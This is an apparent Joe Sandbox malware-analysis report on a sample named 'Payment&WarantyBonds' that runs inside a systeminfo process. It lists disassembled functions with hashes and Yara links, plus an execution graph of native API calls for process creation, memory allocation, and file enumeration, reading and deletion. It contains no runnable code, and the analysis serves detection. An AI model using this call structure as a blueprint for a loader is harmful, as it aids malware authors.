                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                • Opcode ID: de1c687b5801b6d4328d1cb861ac84d444a0fbeb86db536852937e460e5c5e49
                                                                                                                                                                                • Instruction ID: 3d43f4628cff6cf3230014b3ad0380f4cdcf3cd755c03b360da7abee9114c37b
                                                                                                                                                                                • Opcode Fuzzy Hash: de1c687b5801b6d4328d1cb861ac84d444a0fbeb86db536852937e460e5c5e49
                                                                                                                                                                                • Instruction Fuzzy Hash: 02411371700206ABC720DE29CC85F66B7A5FF94714F140619FA66EB280DB31EA52C7D1
                                                                                                                                                                                Function 018B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                • Opcode ID: fc84befe9f65b282780216f6e0de546cff02aca3d9c654cdebd83babac8a2ef2
                                                                                                                                                                                • Instruction ID: 0304e0aac00d737d651a5ee1a3912e06fae77b245e1ac9ebac4b79ee349e6e36
                                                                                                                                                                                • Opcode Fuzzy Hash: fc84befe9f65b282780216f6e0de546cff02aca3d9c654cdebd83babac8a2ef2
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B318472A012199FDB20DE2DCC80BEEB7F9EB44750F44055AE949E3200EB30AB458BA1
                                                                                                                                                                                Function 01847D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                • Instruction ID: 16b8bee1fe64caaf752099486a8fce251b4751ebada60b9f8e1509927acf0865
                                                                                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                • Instruction Fuzzy Hash: 0591B171E0021E9BEB24DF6DC880ABEBBA5FF45720F54461AE955E72C0EF349B408761
                                                                                                                                                                                Function 01809126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                • Opcode ID: 4131ee8efcb70f487cc04537e144ed6668b03d6befa63f2ad3d17f1594e00690
                                                                                                                                                                                • Instruction ID: edfeba0cf8178264d4aefce5bf34fbe780d76d64a064d5afda95e1f3ea3a6657
                                                                                                                                                                                • Opcode Fuzzy Hash: 4131ee8efcb70f487cc04537e144ed6668b03d6befa63f2ad3d17f1594e00690
                                                                                                                                                                                • Instruction Fuzzy Hash: FD811C71D012699BDB768B58CC44BEAB7B9AB08714F0041DAEA1DF7281D7345F84CF61

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:2.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                                                                Signature Coverage:2.3%
                                                                                                                                                                                Total number of Nodes:441
                                                                                                                                                                                Total number of Limit Nodes:76
                                                                                                                                                                                execution_graph 98505 5bb510 98508 5db2e0 98505->98508 98507 5bcb81 98511 5d9440 98508->98511 98510 5db311 98510->98507 98512 5d94d2 98511->98512 98513 5d9468 98511->98513 98514 5d94e8 NtAllocateVirtualMemory 98512->98514 98513->98510 98514->98510 98515 5cf750 98516 5cf7b4 98515->98516 98544 5c6210 98516->98544 98518 5cf8ee 98519 5cf8e7 98519->98518 98551 5c6320 98519->98551 98521 5cfa93 98522 5cf96a 98522->98521 98523 5cfaa2 98522->98523 98555 5cf530 98522->98555 98524 5d92d0 NtClose 98523->98524 98526 5cfaac 98524->98526 98527 5cf9a6 98527->98523 98528 5cf9b1 98527->98528 98564 5db450 98528->98564 98530 5cf9da 98531 5cf9f9 98530->98531 98532 5cf9e3 98530->98532 98567 5cf420 CoInitialize 98531->98567 98533 5d92d0 NtClose 98532->98533 98535 5cf9ed 98533->98535 98536 5cfa07 98570 5d8db0 98536->98570 98538 5cfa82 98574 5d92d0 98538->98574 98540 5cfa8c 98577 5db370 98540->98577 98541 5cfa25 98541->98538 98543 5d8db0 LdrInitializeThunk 98541->98543 98543->98541 98545 5c6243 98544->98545 98546 5c6267 98545->98546 98580 5d8e50 98545->98580 98546->98519 98548 5c628a 98548->98546 98549 5d92d0 NtClose 98548->98549 98550 5c630c 98549->98550 98550->98519 98552 5c6345 98551->98552 98585 5d8c50 98552->98585 98556 5cf54c 98555->98556 98590 5c4490 98556->98590 98558 5cf573 98558->98527 98559 5cf56a 98559->98558 98560 5c4490 LdrLoadDll 98559->98560 98561 5cf63e 98560->98561 98562 5c4490 LdrLoadDll 98561->98562 98563 5cf698 98561->98563 98562->98563 98563->98527 98595 5d9600 98564->98595 98566 5db46b 98566->98530 98569 5cf485 98567->98569 98568 5cf51b CoUninitialize 98568->98536 98569->98568 98571 5d8dca 98570->98571 98598 4722ba0 LdrInitializeThunk 98571->98598 98572 5d8dfa 98572->98541 98575 5d92ed 98574->98575 98576 5d92fe NtClose 98575->98576 98576->98540 98599 5d9650 98577->98599 98579 5db389 98579->98521 98581 5d8e6d 98580->98581 98584 4722ca0 LdrInitializeThunk 98581->98584 98582 5d8e99 98582->98548 98584->98582 98586 5d8c6d 98585->98586 98589 4722c60 LdrInitializeThunk 98586->98589 98587 5c63b9 98587->98522 98589->98587 98592 5c44b4 98590->98592 98591 5c44bb 98591->98559 98592->98591 98593 5c4507 98592->98593 98594 5c44f0 LdrLoadDll 98592->98594 98593->98559 98594->98593 98596 5d961d 98595->98596 98597 5d962e RtlAllocateHeap 98596->98597 98597->98566 98598->98572 98600 5d966a 98599->98600 98601 5d967b RtlFreeHeap 98600->98601 98601->98579 98602 5d0050 98603 5d0073 98602->98603 98604 5c4490 LdrLoadDll 98603->98604 98605 5d0097 98604->98605 98606 5c7252 98608 5c7222 98606->98608 98607 5c7230 98608->98607 98610 5cb1a0 98608->98610 98611 5cb1c6 98610->98611 98616 5cb3ee 98611->98616 98637 5d96e0 98611->98637 98613 5cb23c 98613->98616 98640 5dc540 98613->98640 98615 5cb258 98615->98616 98617 5cb32b 98615->98617 98646 5d8930 98615->98646 98616->98607 98619 5c5a80 LdrInitializeThunk 98617->98619 98621 5cb346 98617->98621 98619->98621 98624 5cb3d6 98621->98624 98657 5d84a0 98621->98657 98622 5cb313 98653 5c8020 98622->98653 98630 5c8020 LdrInitializeThunk 98624->98630 98625 5cb2f1 98672 5d46f0 LdrInitializeThunk 98625->98672 98626 5cb2c3 98626->98616 98626->98622 98626->98625 98650 5c5a80 98626->98650 98632 5cb3e4 98630->98632 98632->98607 98633 5cb3ad 98662 5d8550 98633->98662 98635 5cb3c7 98667 5d86b0 98635->98667 98638 5d96fd 98637->98638 98639 5d970e CreateProcessInternalW 98638->98639 98639->98613 98641 5dc4b0 98640->98641 98642 5db450 RtlAllocateHeap 98641->98642 98645 5dc50d 98641->98645 98643 5dc4ea 98642->98643 98644 5db370 RtlFreeHeap 98643->98644 98644->98645 98645->98615 98647 5d894d 98646->98647 98673 4722c0a 98647->98673 98648 5cb2ba 98648->98617 98648->98626 98676 5d8b00 98650->98676 98652 5c5abe 98652->98625 98654 5c8033 98653->98654 98682 5d8830 98654->98682 98656 5c805e 98656->98607 98658 5d8517 98657->98658 98659 5d84c5 98657->98659 98688 47239b0 LdrInitializeThunk 98658->98688 98659->98633 98660 5d853c 98660->98633 98663 5d8575 98662->98663 98664 5d85c7 98662->98664 98663->98635 98689 4724340 LdrInitializeThunk 98664->98689 98665 5d85ec 98665->98635 98668 5d8727 98667->98668 98669 5d86d5 98667->98669 98690 4722fb0 LdrInitializeThunk 98668->98690 98669->98624 98670 5d874c 98670->98624 98672->98622 98674 4722c11 98673->98674 98675 4722c1f LdrInitializeThunk 98673->98675 98674->98648 98675->98648 98677 5d8bae 98676->98677 98679 5d8b2c 98676->98679 98681 4722d10 LdrInitializeThunk 98677->98681 98678 5d8bf3 98678->98652 98679->98652 98681->98678 98683 5d88ab 98682->98683 98684 5d8858 98682->98684 98687 4722dd0 LdrInitializeThunk 98683->98687 98684->98656 98685 5d88d0 98685->98656 98687->98685 98688->98660 98689->98665 98690->98670 98693 5c8747 98694 5c874a 98693->98694 98696 5c8701 98694->98696 98697 5c7000 98694->98697 98698 5c7016 98697->98698 98700 5c704f 98697->98700 98698->98700 98701 5c6e70 LdrLoadDll 98698->98701 98700->98696 98701->98700 98702 5b9dc0 98704 5b9dcf 98702->98704 98703 5b9e10 98704->98703 98705 5b9dfd CreateThread 98704->98705 98706 5c9b40 98707 5c9b56 98706->98707 98708 5c9b5b 98706->98708 98709 5c9b8d 98708->98709 98710 5db370 RtlFreeHeap 98708->98710 98710->98709 98711 5cc500 98713 5cc529 98711->98713 98712 5cc62d 98713->98712 98714 5cc5d3 FindFirstFileW 98713->98714 98714->98712 98715 5cc5ee 98714->98715 98716 5cc614 FindNextFileW 98715->98716 98716->98715 98717 5cc626 FindClose 98716->98717 98717->98712 98718 5c5b00 98719 5c8020 LdrInitializeThunk 98718->98719 98720 5c5b30 98718->98720 98719->98720 98722 5c5b5c 98720->98722 98723 5c7fa0 98720->98723 98724 5c7fe4 98723->98724 98729 5c8005 98724->98729 98730 5d8600 98724->98730 98726 5c7ff5 98727 5c8011 98726->98727 98728 5d92d0 NtClose 98726->98728 98727->98720 98728->98729 98729->98720 98731 5d8677 98730->98731 98733 5d8625 98730->98733 98735 4724650 LdrInitializeThunk 98731->98735 98732 5d869c 98732->98726 98733->98726 98735->98732 98736 5d1a40 98740 5d1a59 98736->98740 98737 5d1ae6 98738 5d1aa1 98739 5db370 RtlFreeHeap 98738->98739 98741 5d1aae 98739->98741 98740->98737 98740->98738 98742 5d1ae1 98740->98742 98743 5db370 RtlFreeHeap 98742->98743 98743->98737 98754 5d11fc 98755 5d1201 98754->98755 98757 5d11ee 98754->98757 98756 5d121d 98757->98756 98769 5d9140 98757->98769 98759 5d1285 98763 5d92d0 NtClose 98759->98763 98760 5d1270 98762 5d92d0 NtClose 98760->98762 98761 5d1252 98761->98759 98761->98760 98764 5d1279 98762->98764 98766 5d128e 98763->98766 98765 5d12c5 98766->98765 98767 5db370 RtlFreeHeap 98766->98767 98768 5d12b9 98767->98768 98770 5d91e1 98769->98770 98772 5d9165 98769->98772 98771 5d91f7 NtReadFile 98770->98771 98771->98761 98772->98761 98773 5d19bc 98774 5d19c2 98773->98774 98775 5d92d0 NtClose 98774->98775 98777 5d19c7 98774->98777 98776 5d19ec 98775->98776 98778 4722ad0 LdrInitializeThunk 98779 5cac70 98784 5ca980 98779->98784 98781 5cac7d 98798 5ca600 98781->98798 98783 5cac99 98785 5ca9a5 98784->98785 98809 5c8290 98785->98809 98788 5caaf0 98788->98781 98790 5cab07 98790->98781 98791 5caafe 98791->98790 98793 5cabf5 98791->98793 98828 5ca050 98791->98828 98795 5cac5a 98793->98795 98837 5ca3c0 98793->98837 98796 5db370 RtlFreeHeap 98795->98796 98797 5cac61 98796->98797 98797->98781 98799 5ca616 98798->98799 98806 5ca621 98798->98806 98800 5db450 RtlAllocateHeap 98799->98800 98800->98806 98801 5ca642 98801->98783 98802 5c8290 GetFileAttributesW 98802->98806 98803 5ca952 98804 5ca96b 98803->98804 98805 5db370 RtlFreeHeap 98803->98805 98804->98783 98805->98804 98806->98801 98806->98802 98806->98803 98807 5ca050 RtlFreeHeap 98806->98807 98808 5ca3c0 RtlFreeHeap 98806->98808 98807->98806 98808->98806 98810 5c82b1 98809->98810 98811 5c82c3 98810->98811 98812 5c82b8 GetFileAttributesW 98810->98812 98811->98788 98813 5d32e0 98811->98813 98812->98811 98814 5d32ee 98813->98814 98815 5d32f5 98813->98815 98814->98791 98816 5c4490 LdrLoadDll 98815->98816 98817 5d332a 98816->98817 98818 5d3339 98817->98818 98841 5d2da0 LdrLoadDll 98817->98841 98820 5db450 RtlAllocateHeap 98818->98820 98824 5d34e4 98818->98824 98821 5d3352 98820->98821 98822 5d34da 98821->98822 98821->98824 98826 5d336e 98821->98826 98823 5db370 RtlFreeHeap 98822->98823 98822->98824 98823->98824 98824->98791 98825 5db370 RtlFreeHeap 98827 5d34ce 98825->98827 98826->98824 98826->98825 98827->98791 98829 5ca076 98828->98829 98842 5cda60 98829->98842 98831 5ca0e8 98833 5ca270 98831->98833 98834 5ca106 98831->98834 98832 5ca255 98832->98791 98833->98832 98835 5c9f10 RtlFreeHeap 98833->98835 98834->98832 98847 5c9f10 98834->98847 98835->98833 98838 5ca3e6 98837->98838 98839 5cda60 RtlFreeHeap 98838->98839 98840 5ca46d 98839->98840 98840->98793 98841->98818 98844 5cda84 98842->98844 98843 5cda91 98843->98831 98844->98843 98845 5db370 RtlFreeHeap 98844->98845 98846 5cdad4 98845->98846 98846->98831 98848 5c9f2d 98847->98848 98851 5cdaf0 98848->98851 98850 5ca033 98850->98834 98852 5cdb14 98851->98852 98853 5cdbbe 98852->98853 98854 5db370 RtlFreeHeap 98852->98854 98853->98850 98854->98853 98855 5dc470 98856 5db370 RtlFreeHeap 98855->98856 98857 5dc485 98856->98857 98858 5d9230 98859 5d92a4 98858->98859 98861 5d9258 98858->98861 98860 5d92ba NtDeleteFile 98859->98860 98862 5c26ec 98863 5c6210 2 API calls 98862->98863 98864 5c2723 98863->98864 98865 5c0dab 98866 5c0dbf 98865->98866 98867 5c0db3 PostThreadMessageW 98865->98867 98867->98866 98868 5b9e20 98869 5b9fe4 98868->98869 98871 5ba26c 98869->98871 98872 5dafd0 98869->98872 98871->98871 98873 5daff6 98872->98873 98878 5b40d0 98873->98878 98875 5db002 98876 5db03b 98875->98876 98881 5d5570 98875->98881 98876->98871 98885 5c31b0 98878->98885 98880 5b40dd 98880->98875 98882 5d55d1 98881->98882 98884 5d55de 98882->98884 98896 5c1980 98882->98896 98884->98876 98886 5c31cd 98885->98886 98888 5c31e6 98886->98888 98889 5d9d30 98886->98889 98888->98880 98891 5d9d4a 98889->98891 98890 5d9d79 98890->98888 98891->98890 98892 5d8930 LdrInitializeThunk 98891->98892 98893 5d9dd6 98892->98893 98894 5db370 RtlFreeHeap 98893->98894 98895 5d9def 98894->98895 98895->98888 98897 5c19b8 98896->98897 98912 5c7db0 98897->98912 98899 5c19c0 98900 5c1c8d 98899->98900 98901 5db450 RtlAllocateHeap 98899->98901 98900->98884 98902 5c19d6 98901->98902 98903 5db450 RtlAllocateHeap 98902->98903 98904 5c19e7 98903->98904 98905 5db450 RtlAllocateHeap 98904->98905 98907 5c19f8 98905->98907 98911 5c1a8f 98907->98911 98927 5c6970 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98907->98927 98908 5c4490 LdrLoadDll 98909 5c1c42 98908->98909 98923 5d7eb0 98909->98923 98911->98908 98913 5c7ddc 98912->98913 98928 5c7ca0 98913->98928 98916 5c7e09 98919 5c7e14 98916->98919 98920 5d92d0 NtClose 98916->98920 98917 5c7e21 98918 5c7e3d 98917->98918 98921 5d92d0 NtClose 98917->98921 98918->98899 98919->98899 98920->98919 98922 5c7e33 98921->98922 98922->98899 98924 5d7f11 98923->98924 98926 5d7f1e 98924->98926 98939 5c1ca0 98924->98939 98926->98900 98927->98911 98929 5c7cba 98928->98929 98933 5c7d96 98928->98933 98934 5d89d0 98929->98934 98932 5d92d0 NtClose 98932->98933 98933->98916 98933->98917 98935 5d89ea 98934->98935 98938 47235c0 LdrInitializeThunk 98935->98938 98936 5c7d8a 98936->98932 98938->98936 98942 5c1cc0 98939->98942 98955 5c8080 98939->98955 98941 5c220f 98941->98926 98942->98941 98959 5d1070 98942->98959 98945 5c1ed1 98947 5dc540 2 API calls 98945->98947 98946 5c1d1e 98946->98941 98962 5dc410 98946->98962 98949 5c1ee6 98947->98949 98948 5c8020 LdrInitializeThunk 98950 5c1f36 98948->98950 98949->98950 98967 5c07d0 98949->98967 98950->98941 98950->98948 98953 5c07d0 LdrInitializeThunk 98950->98953 98952 5c8020 LdrInitializeThunk 98954 5c208a 98952->98954 98953->98950 98954->98950 98954->98952 98956 5c808d 98955->98956 98957 5c80ae SetErrorMode 98956->98957 98958 5c80b5 98956->98958 98957->98958 98958->98942 98960 5db2e0 NtAllocateVirtualMemory 98959->98960 98961 5d1091 98960->98961 98961->98946 98963 5dc426 98962->98963 98964 5dc420 98962->98964 98965 5db450 RtlAllocateHeap 98963->98965 98964->98945 98966 5dc44c 98965->98966 98966->98945 98970 5d9560 98967->98970 98971 5d957a 98970->98971 98974 4722c70 LdrInitializeThunk 98971->98974 98972 5c07f2 98972->98954 98974->98972 98975 5c2220 98976 5d8930 LdrInitializeThunk 98975->98976 98977 5c2256 98976->98977 98980 5d9370 98977->98980 98979 5c226b 98981 5d93fc 98980->98981 98983 5d9398 98980->98983 98985 4722e80 LdrInitializeThunk 98981->98985 98982 5d942d 98982->98979 98983->98979 98985->98982 98986 5c6ce0 98987 5c6d0a 98986->98987 98990 5c7e50 98987->98990 98989 5c6d34 98991 5c7e6d 98990->98991 98997 5d8a20 98991->98997 98993 5c7ebd 98994 5c7ec4 98993->98994 98995 5d8b00 LdrInitializeThunk 98993->98995 98994->98989 98996 5c7eed 98995->98996 98996->98989 98998 5d8ab5 98997->98998 99000 5d8a45 98997->99000 99002 4722f30 LdrInitializeThunk 98998->99002 98999 5d8aee 98999->98993 99000->98993 99002->98999 99008 5d88e0 99009 5d88fd 99008->99009 99012 4722df0 LdrInitializeThunk 99009->99012 99010 5d8925 99012->99010 99013 5d16a0 99014 5d16bc 99013->99014 99015 5d16f8 99014->99015 99016 5d16e4 99014->99016 99017 5d92d0 NtClose 99015->99017 99018 5d92d0 NtClose 99016->99018 99019 5d1701 99017->99019 99020 5d16ed 99018->99020 99023 5db490 RtlAllocateHeap 99019->99023 99022 5d170c 99023->99022 99024 5d8760 99025 5d87ec 99024->99025 99026 5d8788 99024->99026 99029 4722ee0 LdrInitializeThunk 99025->99029 99027 5d881d 99029->99027 99030 5d8fe0 99031 5d9091 99030->99031 99033 5d9009 99030->99033 99032 5d90a7 NtCreateFile 99031->99032 99034 5d5fe0 99035 5d603a 99034->99035 99037 5d6047 99035->99037 99038 5d3a00 99035->99038 99039 5db2e0 NtAllocateVirtualMemory 99038->99039 99040 5d3a41 99039->99040 99041 5d3b3e 99040->99041 99042 5c4490 LdrLoadDll 99040->99042 99041->99037 99044 5d3a7e 99042->99044 99043 5d3ac0 Sleep 99043->99044 99044->99041 99044->99043 99045 5c30a3 99046 5c7ca0 2 API calls 99045->99046 99047 5c30b3 99046->99047 99048 5c30cf 99047->99048 99049 5d92d0 NtClose 99047->99049 99049->99048

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 005B9E20 Relevance: 12.8, Strings: 10, Instructions: 295COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 219 5b9e20-5b9fdd 220 5b9fe4-5b9fe8 219->220 221 5b9fea-5ba015 220->221 222 5ba017 220->222 221->220 223 5ba01e-5ba02e 222->223 223->223 224 5ba030-5ba040 223->224 224->224 225 5ba042-5ba050 224->225 226 5ba05b-5ba064 225->226 227 5ba072-5ba07d 226->227 228 5ba066-5ba070 226->228 230 5ba088-5ba091 227->230 228->226 231 5ba09f-5ba0a5 230->231 232 5ba093-5ba09d 230->232 233 5ba0ab-5ba0b2 231->233 234 5ba238-5ba23f 231->234 232->230 236 5ba0bd-5ba0c3 233->236 237 5ba24a-5ba250 234->237 240 5ba0d9-5ba0e0 236->240 241 5ba0c5-5ba0d7 236->241 238 5ba25e-5ba265 237->238 239 5ba252-5ba25c 237->239 242 5ba2d8-5ba2e8 238->242 243 5ba267 call 5dafd0 238->243 239->237 245 5ba0e2-5ba0ff 240->245 246 5ba101-5ba111 240->246 241->236 242->242 250 5ba2ea-5ba2f4 242->250 251 5ba26c-5ba285 243->251 245->240 246->246 249 5ba113-5ba11a 246->249 252 5ba11c-5ba133 249->252 253 5ba135-5ba13c 249->253 251->251 254 5ba287-5ba28b 251->254 252->249 255 5ba147-5ba14d 253->255 256 5ba28d-5ba2a4 254->256 257 5ba2a6-5ba2aa 254->257 258 5ba14f-5ba15f 255->258 259 5ba161-5ba176 255->259 256->254 257->242 260 5ba2ac-5ba2d6 257->260 258->255 262 5ba1a9-5ba1b0 259->262 263 5ba178-5ba17f 259->263 260->257 264 5ba1bb-5ba1c1 262->264 265 5ba181-5ba197 263->265 266 5ba1a4 263->266 269 5ba1c3-5ba1cf 264->269 270 5ba1d1-5ba1e2 264->270 267 5ba199-5ba19f 265->267 268 5ba1a2 265->268 266->234 267->268 268->263 269->264 272 5ba1ed-5ba1f3 270->272 273 5ba206-5ba20a 272->273 274 5ba1f5-5ba204 272->274 276 5ba20c-5ba231 273->276 277 5ba233 273->277 274->272 276->273 277->231
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 9$z$#'$'l$'y$GK$NW$~H$4$w
                                                                                                                                                                                • API String ID: 0-783608958
                                                                                                                                                                                • Opcode ID: 3ee51196ccf0d76963df58c81e92624905764aeecc10a67d2ef9a6bddbc44700
                                                                                                                                                                                • Instruction ID: 39fb00a4df7c269023d19fb29f5ebfc119c66d0b0e377a891b71d26bf3fb82ee
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ee51196ccf0d76963df58c81e92624905764aeecc10a67d2ef9a6bddbc44700
                                                                                                                                                                                • Instruction Fuzzy Hash: 09E1C2B0D05269CFEB24CF98C8987EDBBB1FB44308F208599D009BB285C7B96985DF45
                                                                                                                                                                                Function 005CC500 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 005CC5E4
                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 005CC61F
                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 005CC62A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                • Opcode ID: 347c652754719286c6943b3f92082ae1d2389480664ea2fdab00ad7d856c91d9
                                                                                                                                                                                • Instruction ID: 0eb3d5231a67a9dc40a902fdfbe0a5aede3b1d5969a63ee0a39812e51b5bdecc
                                                                                                                                                                                • Opcode Fuzzy Hash: 347c652754719286c6943b3f92082ae1d2389480664ea2fdab00ad7d856c91d9
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D31A771A00309BFDB20DBA4CC45FFB7B7CBB84704F14449DF909A7181D670AA858BA4
                                                                                                                                                                                Function 005D8FE0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtCreateFile.NTDLL(0000006F,2A4B6D90,?,?,?,?,?,?,?,?,?), ref: 005D90D8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                • Opcode ID: bb34955bba97853b7765a6d160fe001ce9d91580284fbb0d601ae2af88a1f003
                                                                                                                                                                                • Instruction ID: c590c36ae33e9adc2561fb50ff8571b2d5567f50763db5a157ec87d0ca30f678
                                                                                                                                                                                • Opcode Fuzzy Hash: bb34955bba97853b7765a6d160fe001ce9d91580284fbb0d601ae2af88a1f003
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D31DA75A11209AFDB54DF99D881EEE7BB9FF8C310F00850AF918A7340D730A811CBA5
                                                                                                                                                                                Function 005D9140 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtReadFile.NTDLL(0000006F,2A4B6D90,?,?,?,?,?,?,?), ref: 005D9220
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                • Opcode ID: 90cccae70db432994000959dfd1fceacd80a30804f5c4610f5b406654ed4dfdd
                                                                                                                                                                                • Instruction ID: d89606bef335728f8c44039f621275f672fc02d0b5bb2171680df8714e1da9ec
                                                                                                                                                                                • Opcode Fuzzy Hash: 90cccae70db432994000959dfd1fceacd80a30804f5c4610f5b406654ed4dfdd
                                                                                                                                                                                • Instruction Fuzzy Hash: 1D31DD75A00609AFDB14DF99D881EEF77B9FF88310F10861AF919A7340D770A911CBA5
                                                                                                                                                                                Function 005D9440 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(005C1D1E,2A4B6D90,005D7F1E,00000000,00000004,00003000,?,?,?,?,?,005D7F1E,005C1D1E,005D7F1E,758B56EC,005C1D1E), ref: 005D9505
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                • Opcode ID: 51428141bc61c25ce69973498f3e53e5da001e7ac444ae6020fce22643847750
                                                                                                                                                                                • Instruction ID: db0beb80856fbce06693ddd8fbd9ac03208812e99cb03d86bb03231e9a723a80
                                                                                                                                                                                • Opcode Fuzzy Hash: 51428141bc61c25ce69973498f3e53e5da001e7ac444ae6020fce22643847750
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B212D75A00209AFDB14DF98DC41EEFB7B9FF88710F00850AF918A7341D770A9118BA5
                                                                                                                                                                                Function 005D9230 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtDeleteFile.NTDLL(0000006F), ref: 005D92C3
                                                                                                                                                                                Memory Dump Source
